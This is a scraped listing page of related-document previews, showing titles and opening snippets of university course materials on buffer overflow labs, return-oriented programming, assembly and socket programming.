More informationBuffer Overflow Vulnerability
Buffer Overflow Vulnerability 1 Buffer Overflow Vulnerability Copyright c 2006 2014 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National
More informationl27 handout.txt buggy server.c Printed by Michael Walfish Apr 29, 10 13:41 Page 1/1 Apr 29, 10 11:51 Page 1/1
Apr 29, 10 13:41 Page 1/1 1 Handout for CS 372H 2 Class 27 3 29 April 2010 4 5 1. Introduction to buffer overflow attacks 6 7 There are many ways to attack computers. Today we study the 8 "classic" method.
More informationPiotr Mielecki Ph. D.
Piotr Mielecki Ph. D. http://mielecki.ristel.pl/ piotr.mielecki@pwr.edu.pl pmielecki@gmail.com Building blocks of client-server applications: Client, Server, Middleware. Simple client-server application:
More informationBiography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
More informationCSE 333 Lecture network programming intro
CSE 333 Lecture 17 -- network programming intro Hal Perkins Paul G. Allen School of Computer Science & Engineering University of Washington Administrivia HW3 due Thursday night HW4 out Friday morning -
More informationMachine Language, Assemblers and Linkers"
Machine Language, Assemblers and Linkers 1 Goals for this Lecture Help you to learn about: IA-32 machine language The assembly and linking processes 2 1 Why Learn Machine Language Last stop on the language
More informationUNIX Network Programming. Overview of Socket API Network Programming Basics
UNIX Network Programming Overview of Socket API Network Programming Basics 1 Client-Server Model Client Machine A Network Server Machine B Web browser and server FTP client and server Telnet client and
More informationSockets 15H2. Inshik Song
Sockets 15H2 Inshik Song Internet CAU www server (www.cau.ac.kr) Your web browser (Internet Explorer/Safari) Sockets 2 How do we find the server? Every computer on the Internet has an Internet address.
More informationLecture 04 Control Flow II. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422
Lecture 04 Control Flow II Stehen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422 Function calls on 32-bit x86 Stack grows down (from high to low addresses)
More informationOral. Total. Dated Sign (2) (5) (3) (2)
R N Oral Total Dated Sign (2) (5) (3) (2) Assignment Group- A_07 Problem Definition Write a program using TCP socket for wired network for following Say Hello to Each other ( For all students) File transfer
More informationReturn Oriented Programming
ROP gadgets Small instruction sequence ending with a ret instruction 0xc3 Gadgets are found in existing, resident code and libraries There exist tools to search for and find gadgets Gadgets are put together
More informationSystem Programming. Sockets
Content : by Dr. B. Boufama School of Computer Science University of Windsor Instructor: Dr. A. Habed adlane@cs.uwindsor.ca http://cs.uwindsor.ca/ adlane/60-256 Content Content 1 Introducing 2 3 Internet
More informationReturn oriented programming
Return oriented programming TOOR - Computer Security Hallgrímur H. Gunnarsson Reykjavík University 2012-05-04 Introduction Many countermeasures have been introduced to foil EIP hijacking: W X: Prevent
More informationALT-Assembly Language Tutorial
ALT-Assembly Language Tutorial ASSEMBLY LANGUAGE TUTORIAL Let s Learn in New Look SHAIK BILAL AHMED i A B O U T T H E T U TO R I A L Assembly Programming Tutorial Assembly language is a low-level programming
More informationCSE 333 SECTION 6. Networking and sockets
CSE 333 SECTION 6 Networking and sockets Overview Network Sockets IP addresses and IP address structures in C/C++ DNS Resolving DNS names Demos Section exercise Sockets Network sockets are network interfaces
More informationNetwork Programming November 3, 2008
15-213 Network Programming November 3, 2008 Topics Programmer s view of the Internet (review) Sockets interface Writing clients and servers class20.ppt A Client-Server Transaction Most network applications
More informationSocket Programming for TCP and UDP
CSCI4430 Data Communication and Computer Networks Socket Programming for TCP and UDP ZHANG, Mi Jan. 19, 2017 Outline Socket Programming for TCP Introduction What is TCP What is socket TCP socket programming
More informationContext. Distributed Systems: Sockets Programming. Alberto Bosio, Associate Professor UM Microelectronic Departement
Distributed Systems: Sockets Programming Alberto Bosio, Associate Professor UM Microelectronic Departement bosio@lirmm.fr Context Computer Network hosts, routers, communication channels Hosts run applications
More informationReverse Engineering II: The Basics
Reverse Engineering II: The Basics This document is only to be distributed to teachers and students of the Malware Analysis and Antivirus Technologies course and should only be used in accordance with
More information9/13/2007. Motivations for Sockets What s in a Socket? Working g with Sockets Concurrent Network Applications Software Engineering for Project 1
Daniel Spangenberger 15 441 Computer Networks, Fall 2007 Goal of Networking: Communication Share data Pass Messages Say I want to talk to a friend in Singapore How can I do this? What applications and
More informationIntroduction to Socket Programming
Introduction to Socket Programming Sandip Chakraborty Department of Computer Science and Engineering, INDIAN INSTITUTE OF TECHNOLOGY KHARAGPUR March 21, 2017 Sandip Chakraborty (IIT Kharagpur) CS 39006
More informationWinSock. What Is Sockets What Is Windows Sockets What Are Its Benefits Architecture of Windows Sockets Network Application Mechanics
WinSock What Is Sockets What Is Windows Sockets What Are Its Benefits Architecture of Windows Sockets Network Application Mechanics What Is Sockets Standard API (Application Programming Interface) for
More informationTypes (Protocols) Associated functions Styles We will look at using sockets in C Java sockets are conceptually quite similar
Socket Programming What is a socket? Using sockets Types (Protocols) Associated functions Styles We will look at using sockets in C Java sockets are conceptually quite similar - Advanced Data Communications:
More informationBuffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to
CPSC 8810 Fall 2018 Lab 1 1 Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through email to lcheng2@clemson.edu Copyright c 2006-2014 Wenliang Du, Syracuse
More informationIntroduction to Socket Programming
UNIT II - ELEMENTARY TCP SOCKETS Introduction to Socket Programming Introduction to Sockets Socket address Structures Byte ordering functions address conversion functions Elementary TCP Sockets socket,
More informationCS 43: Computer Networks. 05: Socket Programming September 12-14, 2018
CS 43: Computer Networks 05: Socket Programming September 12-14, 2018 Reading Quiz Lecture 5/6 - Slide 2 Socket Programming Adapted from: Donahoo, Michael J., and Kenneth L. Calvert. TCP/IP sockets in
More informationLab 0. Yvan Petillot. Networks - Lab 0 1
Lab 0 Yvan Petillot Networks - Lab 0 1 What You Will Do In This Lab. The purpose of this lab is to help you become familiar with the UNIX/LINUX on the lab network. This means being able to do editing,
More informationl27 handout.txt buggy server.c Printed by Michael Walfish Apr 28, 11 15:24 Page 1/1 Apr 27, 11 1:53 Page 1/2
Apr 28, 11 15:24 Page 1/1 1 Handout for CS 372H 2 Class 27 3 28 April 2011 4 5 1. Introduction to buffer overflow attacks 6 7 There are many ways to attack computers. Today we study the 8 "classic" method.
More information